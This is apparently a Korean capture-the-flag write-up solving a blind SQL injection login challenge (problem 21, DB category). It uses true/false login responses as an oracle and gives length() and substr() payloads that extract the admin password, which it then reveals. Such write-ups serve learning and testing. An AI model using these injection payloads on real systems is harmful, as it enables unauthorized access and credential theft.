본문 바로가기

 

21번 문제에요.

배점은 250점, 분야는 DB이에요.

 

 

딱봐도 BLIND SQL Injection을 하라고 하네요.

 

 

guest / guest 를 넣어본 결과?

 

 

Result : login success

 

 

 

admin / 1234 를 넣어보면?

 

 

Result : login fail

 

 

admin' and 1=1# / 1

 

를 넣어보면?

 

 

Result : wrong password

 

 

admin' and 2=1# / 1

 

를 넣어보면?

 

 

Result : login fail

 

이렇게 뜨네요.

구문이 true이고 비밀번호가 맞으면 = 로그인 성공

구문이 true이고 비밀번호가 다르면 = 잘못된 비밀번호

구문이 false이면 = 로그인 실패

 

인가보네요.

 

 

 

select 를 넣었을때

Result : no hack

가 뜨는걸로 보아 select가 필터링되고있으니

컬럼명을 추측해서 넣어야 되는데 그냥 pw로 해볼게요.

 

 

 

길이 = ?id=admin' and length(pw)=0%23&pw=1

값 : ?id=admin' and substr(pw,1,1)='0'%23&pw=1

 

로 돌려본 결과?

 

 

there_is_no_rest_for_the_white_angel

 

 

 

admin / there_is_no_rest_for_the_white_angel

 

로 로그인을 시도해보면?

 

 

빠밤!

 

 

문제가 풀렸네요.

댓글